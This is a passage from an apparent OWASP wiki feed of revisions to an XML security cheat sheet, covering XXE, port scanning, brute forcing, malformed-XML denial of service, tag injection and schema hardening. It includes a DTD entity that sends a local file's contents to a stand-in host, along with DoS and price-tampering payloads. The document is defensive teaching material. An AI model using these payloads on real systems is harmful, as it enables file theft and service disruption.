 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM ''''http://example.com/?%file;''''''&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
  at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
  at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme (http, ftp, etc). For example the following :&lt;br /&gt;
 http://username:password@example.com:8080/&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;br /&gt;
[[Category:Popular]]&lt;br /&gt;
[[Category:OWASP_Breakers]]&lt;br /&gt;
{{TOC hidden}}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224442</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224442"/>
				<updated>2016-12-21T20:34:00Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
